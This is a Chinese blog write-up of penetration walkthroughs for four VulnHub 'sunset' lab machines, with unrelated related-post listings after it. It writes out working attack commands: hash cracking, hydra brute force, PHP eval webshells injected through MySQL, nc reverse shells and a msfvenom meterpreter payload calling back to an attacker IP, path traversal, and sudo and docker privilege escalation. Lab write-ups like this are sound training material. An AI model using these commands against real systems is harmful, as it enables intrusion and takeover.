vulnhub sunset系列靶机合集(部分)

最新推荐文章于 2025-08-11 15:03:02 发布
原创 最新推荐文章于 2025-08-11 15:03:02 发布 · 751 阅读 · 28 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #linux #笔记 #渗透测试 #vulnhub #渗透

描述:该合集包含sunset系列适合新手的四个靶机(sunset:1、dusk、sunrise、noontide)的渗透全过程。

靶机下载地址:Vulnerable By Design - Search: sunset ~ VulnHubhttps://www.vulnhub.com/?q=sunset

sunset:1

渗透过程

信息收集

确认目标主机ip:192.168.56.126,并且开放21,22端口。

nmap 192.168.56.0/24 -Pn 

nmap 192.168.56.126 -A -T4

FTP匿名登录

anonymou:空密码

mget命令下载backup文件到本地,获得类似于shadow文件中密码加密的部分。

CREDENTIALS:                                                                                                                                                                                                       
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.                                                                                                                  
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/                                                                                                              
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                                                                                                                     
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/ 

john破解

重点看一下

sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/

$6表示是SHA-512加密。

john backup

sunset:cheer14

ssh连接成功,获得user.txt。

ed提权

sudo ed
!/bin/sh

命令参考ed | GTFOBins

提权成功。

sunset:dusk

渗透过程

信息收集

nmap 192.168.56.0/24 -Pn

nmap 192.168.56.127 -A -T4

开放端口:21,22,25,80,3306,8080。

8080端口提示当前目录是/var/tmp。

hydra爆破数据库

没什么收获尝试爆破ssh,mysql密码。

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.56.127 mysql

root:password,成功连接数据库。

mysql写入webshell

根据前面8080端口提示的路径/var/tmp,向该路径写入一句话木马。

select "<?php eval($_GET['cmd']);?>" into outfile "/var/tmp/1.php";

验证一下,成功写入了一句话木马。

蚁剑连接时发现返回空,换个一句话木马

select "<?php @eval($_POST['cmd']);?>" INTO OUTFILE "/var/tmp/shell.php";

之后上传反弹shell文件即可or不连接蚁剑直接nc反弹shell

http://192.168.56.127:8080/shell.php?cmd=system(%27nc%20-e%20/bin/sh%20192.168.56.109%208888%27);

http://192.168.56.127:8080/1.php?cmd=system(%27nc%20-e%20/bin/sh%20192.168.56.109%208888%27);

python获取tty

python -c 'import pty;pty.spawn("/bin/bash")'

get user.txt。

提权

提权到dusk。

COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"

这时注意到dusk属于docker组。

docker用户组提权

docker用户组提权原理不说了,利用过程简而言之就是利用任意镜像创建容器。

docker images

# 没有镜像就拉一个
docker pull alpine

docker run -v /:/mnt -it apline

# 参数解析
-v # 给容器挂载存储卷,挂载到容器的某个目录
-i # 控制台交互
-t # 分配tty设备

get root.txt。

sunset:sunrise

渗透过程

信息收集

nmap 192.168.56.0/24 -Pn

nmap 192.168.56.130 -A -T4

全面扫描还是有必要的,例如这里主机发现时知道开放了22,80,3306端口;全面扫描后发现还有8080端口也开放了。

访问8080端口得到一个信息weborf0.12.2。

weborf目录穿越

searchsploit搜索一下有没有漏洞可以利用。

有一个目录穿越可以试试。

..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

得到信息:存在sunrise和weborf两个用户。

通过目录穿越看看两个用户目录下有没有什么可用信息。

/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

get user.txt.

a6050aecf6303b0b824038807d823a89

挨个看没发现什么。

direarch再扫一下/weborf目录下的文件。

dirsearch -u http://192.168.56.130:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

在.mysql_history中得到一组用户名密码。

show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

用这组密码ssh连接成功,mysql连接成功。

在mysql数据库user表中得到sunrise的明文密码thefutureissobrightigottawearshades和root用户的加密密码(md5解密,需要付费暂时放弃,看看有没有其他方法提权到root)。

提权

切换到sunrise用户后,sudo -l。

wine命令提权,这个命令就是linux用来运行exe文件的。因此,尝试msf生成一个exe木马,上传到目标机用wine命令执行。

# 攻击机
msfvenom -p windows/meterpreter/reverse_tcp -f exe  --platform windows -a x86 LHOST=192.168.56.109 LPORT=4444 -o 1.exe

# 开启简易http
python -m http.server

# msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.109
run

# 目标机
cd tmp
wget http://192.168.56.109:8000/1.exe
/usr/bin/wine 1.exe

get root.txt.

sunset:noontide

渗透过程

简单信息收集

# 主机发现
nmap 192.168.56.0/24 -Pn
​
# 端口扫描
nmap 192.168.56.124 -A -T4

发现仅开放6667端口,版本信息:UnrealIRCd

UnrealIRCd漏洞利用

msfconsole
search UnrealIRCd


use 0
set payload cmd/unix/reverse_perl
set RHOSTS 192.168.56.124
set LHOSTS 
run

通过python获得一个完整的tty。

python3 -c 'import pty;pty.spawn("/bin/bash")'

get local.txt

弱口令root....切换到root权限。

get proof.txt🎆

vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1378
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
Vulnhub:SUNSET-DAWN靶机
logan_logan的博客
06-06 652
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 发现开启了samba服务,接下来对samba服务进行枚举; nmap -p- 192.168.31.130 nmap -sC -sV -p 139,445,3306,12345 192.168.31.130 对samba服务枚举得时候发现了ITDEPT共享目录,不需要密码就可以登录 enum4linux -a -o 192.168.31.130 登录samba后,发现并没有文件存在,但是这个目录可以上传文件; smbclient
Vulnhub靶机Sunset:1
所有文章均免费阅读,大家一起学习
07-04 409
使用john对上面的密码文件进行破解,下面是没有跑完的,猜测除了sunset其他都是跟用户名一样,应该只有sunset是有用的,毕竟靶机名就叫这个,而且其他的太简单了。sudo -l 这个命令可以查看有哪些命令可以执行,即不需要知道用户密码,只需验证自身权限的密码即可。使用sudo -l命令发现可以免密使用root身份执行ed命令,于是使用ed命令提权。上面的扫描结果可以发现ftp中有一个backup文件,匿名访问,下载下来,内容如下。靶机ip:192.168.233.134。sudo -l看看怎么个事。
Vulnhub sunset系列--nightfall
sinat_36853972的博客
07-08 463
nightfall 0x00 信息收集 arp-scan发现主机 靶机的ip为192.168.106.134 nmap扫描 80端口是一个apache的页面 使用enum4linux,收集到smb信息 将得到的两个用户放在User.txt中 使用hydra爆破得到ftp的用户密码为matt/cheese 使用这个账号密码登录ftp 可以猜到这是在/home/matt目录下 0x01 上传ssh公钥 通过SSH 使用密钥登录并禁止口令登录实践 这篇文章,猜测可以上传一个公钥到靶机上,实现ssh免
vulnhub sunset: noontide
箭雨镜屋
03-23 1920
nmap扫描 ---- searchsploit搜索payload ---- Metasploit利用UnrealIRCd漏洞得到shell ---- su命令弱密码提权
vulnhub靶机-sunset:dawn
臭nana的博客
07-16 1311
1、找到靶机ip:192.168.0.123 nmap 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.123 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.123 Host is up (0.0090s latency). Not shown: 65531 closed ports PORT STATE SERV
vulnhub sunset: solstice
箭雨镜屋
08-14 1012
渗透思路:nmap扫描端口 ---- 利用LFI和apache访问日志getshell ---- 利用可写的本地http服务php文件提权
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1211
这台靶机sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
vulnhubsunset decoy
Aukum的博客
04-09 528
vulnhub sunset系列靶机之一decoy渗透全过程,涉及到john爆破压缩包密码、shadow SHA-512加密破解、rbash逃逸、chkrootkit 0.49提权。
SUNSET: MIDNIGHT靶机
logan_logan的博客
07-22 584
1.浏览器输入地址打开网页;
VulnHub靶场之sunset:noontide
A_dmin的博客
09-30 1294
VulnHub靶场之sunset:noontide nmap扫描主机存活: 扫描端口,开放三个端口: emmm,irc是什么服务啊,就很迷,,百度搜索一波,,,好像是一个类似于网络聊天啥的东西 不太会啊,也没玩过这个,,,,直接searchsploit搜索一下版本好像是unreal: 还真有!使用第三个,,,,先下载到本地 使用msfvenom生成payload: 复制如上payload,打开13853.pl更改payload,一开始有五行直接删除其余四行,更改第一行: 然后保存运行: 监听4
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8745
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
构建安全 Web 应用:从用户认证与授权到 JWT 原理解析
windowshht的博客
08-08 1118
本文深入探讨了Web应用安全中的用户认证与授权机制,重点解析了JWT(JSON Web Token)的工作原理及实现方式。文章首先区分了认证(Authentication)与授权(Authorization)的差异,随后对比了传统Session与JWT的特性,指出JWT在无状态、跨域支持和性能方面的优势。详细剖析了JWT的三部分结构(Header、Payload、Signature)及其验证流程。
电气安全预警系统:全流程闭环管理
Guheyunyi的博客
08-08 335
该架构设计符合GB/T 32575-2016电气火灾监控系统标准,通过分层解耦实现灵活部署,满足工业/商业/民用等不同场景需求。随着数字孪生技术的应用,未来将向"预测性维护+自主决策"方向演进,构建更智能的电气安全防护体系。电气安全预警系统是保障电力系统稳定运行和预防电气火灾的关键技术体系,其架构设计遵循"感知-传输-分析-决策-执行"的技术路线,构建多层协同的智能化预警平台。电气参数传感器(电压/电流/漏电流)电能质量分析(谐波/闪变/不平衡度)电弧检测装置(高/低频电弧识别)
锂电池保护板测试仪:守护电池安全的核心工具|深圳鑫达能
szxdndccs的博客
08-08 753
在锂电池广泛应用于电动汽车、储能系统、消费电子等领域的今天,电池的安全性已成为行业发展的核心议题。锂电池保护板作为防止电池过充、过放、短路等异常情况的关键部件,其性能直接关系到电池的使用寿命与安全。而锂电池保护板测试仪,正是确保保护板功能可靠、性能稳定的“质检官”,为电池全生命周期的安全运行提供坚实保障。
F5发布业界首创集成式应用交付与安全平台,开启ADC 3.0新时代
hanniuniu13的博客
08-08 350
全新的 F5 应用交付与安全平台历经多年投入与创新打造,可无缝运行于本地数据中心的高性能硬件、虚拟化与混合环境中的下一代软件,以及云原生环境的 SaaS 解决方案,实现跨环境的高效运维与安全防护。全新 F5 应用交付与安全平台将当前分散的单一解决方案进行深度整合,以全面满足高性能负载均衡、多云网络连接、全面的 Web 应用与 API 安全防护,以及 AI 网关能力等关键需求。一体化应用交付与安全防护:将每个应用的交付与安全深度集成至单一平台,以简化 IT 与安全团队管理。
护网行动之后:容器安全如何升级?微隔离打造内网“微堡垒”
蔷薇灵动
08-07 561
摘要:护网行动凸显了容器网络安全的重要性。容器"大二层"网络的扁平化设计虽便于部署,却为攻击者提供了横向移动的便利,导致企业面临平台核心暴露、业务边界模糊、应急响应困难等痛点。尽管Kubernetes自带NetworkPolicy功能,但其可视化不足、配置繁琐、性能损耗大等局限性难以满足企业需求。微隔离技术凭借流量可视化、策略自动化、动态适配等优势,成为容器网络安全的"定海神针",实现了精准的访问控制和性能优化,为云原生环境构建起坚固的"微堡垒",
LAZADA跨境电商自养号测评环境搭建:安全与合规的底层逻辑解析
最新发布
m0_61644681的博客
08-11 334
通过工具模拟真实用户的设备特征(如机型、操作系统、屏幕分辨率等),并将设备参数伪装成目标市场本地用户的典型配置(例如东南亚地区的安卓手机+当地运营商网络组合),从而降低异常识别概率。测评系统的本质,是通过对平台风控逻辑的逆向理解,构建一套尽可能接近真实用户行为的技术环境。平台风控系统不仅依赖IP地址判断用户行为,更会通过设备指纹技术采集底层硬件参数,如MAC地址、设备ID、浏览器指纹、系统时区、语言设置等,进行多维度关联分析。
WiFi原理与WiFi安全
一念的博客
08-10 841
利用无线电波(2.4GHz/5GHz/6GHz)在有线网络和无线设备间传输数据。核心是AP和客户端通过CSMA/CA机制共享信道,通过关联/认证过程建立连接,并依赖强大的加密协议保护空中传输的数据帧。无线广播特性带来固有风险。加密是基石(WPA3是最佳选择,WPA2-AES是底线)。强密码是个人网络的关键防线。防范窃听、非法接入、中间人攻击、DoS、密码破解和恶意热点需要综合运用技术手段(更新协议、固件)和良好的安全习惯(用VPN、警惕公共WiFi、更新设备)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值